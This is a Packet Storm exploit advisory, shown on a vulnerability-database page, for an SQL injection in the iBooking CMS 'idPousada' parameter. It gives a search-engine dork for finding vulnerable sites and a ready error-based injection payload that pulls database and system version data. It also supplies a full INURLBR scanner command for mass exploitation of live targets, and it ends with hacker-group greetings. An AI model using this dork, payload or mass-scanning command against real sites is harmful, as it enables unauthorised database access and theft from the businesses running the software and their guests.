Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormCleiton PinheiroPACKETSTORM:133599
HistorySep 18, 2015 - 12:00 a.m.

iBooking CMS SQL Injection

2015-09-1800:00:00
Cleiton Pinheiro
packetstormsecurity.com
51
JSON
`*# VENTOR: * www.ibooking.com.br  
*# Vulnerable versions:* ALL  
*# File: * filtro_faixa_etaria.php  
*# Parameter: * idPousada(GET)  
*# DORK: * intext:"Desenvolvido por ibooking"  
*# Reported:* 15/10/2015  
#  
---------------------------------------------------------------------------------  
# AUTOR: Cleiton Pinheiro / Nick: googleINURL  
# EMAIL: [email protected]  
# Blog: http://blog.inurl.com.br  
# Twitter: https://twitter.com/googleinurl  
# Fanpage: https://fb.com/InurlBrasil  
# Pastebin http://pastebin.com/u/Googleinurl  
# GIT: https://github.com/googleinurl  
# PSS: http://packetstormsecurity.com/user/googleinurl  
# EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro  
# YOUTUBE: http://youtube.com/c/INURLBrasil  
# PLUS: http://google.com/+INURLBrasil  
#  
---------------------------------------------------------------------------------  
  
*# Description*  
The vulnerable request is made through a javascript function found within  
/motor-de-reservas  
  
  
# Javascript code responsible for vulnerable request  
  
$.ajax({  
type: "GET",  
url: "filtro_faixa_etaria.php",  
data: "qtde_quartos=1&idPousada=61",  
success: function(xml){  
$("#filtro_faixa_etaria").html(xml);  
}  
});  
  
  
*# URL Vulnerable:*  
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61  
  
*# POC:*  
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)  
  
*# Example:*  
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)  
  
*# Return print:*  
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png  
  
  
*# Mass exploration using scanner INURLBR*  
# Download: https://github.com/googleinurl/SCANNER-INURLBR  
  
*# COMMAND*  
*# SETTING DORK DE PESQUISA*  
--dork 'YOU_DORK'  
*# USE* --dork 'intext:"Desenvolvido por ibooking"'  
  
*# SETTING OUTPUT FILE:*  
*# USE* -s 'ibooking.txt'  
  
*# SETTING STRING EXPLOIT GET:*  
--exploit-get 'EXPLOIT_GET'  
*# USE* --exploit-get  
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'  
  
*# SETTING TYPE OF VALIDATION: *  
*# USE* -t 3  
The third type combine both first and second types: Then, of course, it  
also establishes connection with the exploit through the get method.  
The string get set in parameter --exploit-get It is injected directly in  
the url:  
Exemplo: --exploit-get '/index.php?id=1&file=conect.php'INJEÇÃO URL:  
http://www.target.br/index.php?id=1&file=conect.php  
  
*# SETTING STRING OF VALIDATION:*  
Specify the string to be used as validation script:  
Exemplo: -a {string}  
Usando: -a '<title>hello world</title>'  
If the specific value is found in the target, it is considered vulnerable.  
- USE: -a 'INURLBR_VULN'  
The INURLBR_VULN value is passed in hexadecimal format in the exploit-get  
string  
  
*# COMMAND FULL:*  
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s  
'ibooking.txt' --exploit-get  
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'  
-t 3 -a 'INURLBR_VULN'  
  
*# MORE INFORMATION:*  
http://blog.inurl.com.br/2015/09/0day-ibooking-cms-injecao-de-sql-e.html  
  
  
  
+--------------------------------------------------------------------------------------+  
| | | G R 3 3 T S  
| | |  
  
+--------------------------------------------------------------------------------------+  
* r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r,  
arplhmd, 0x4h4x  
* Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra,  
Eclipse, shaxer  
* dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão,  
IceKiller, c00z  
* Oystex, rH, Warflop, se4b3ar , Pablo Verlly Moreira  
`
JSON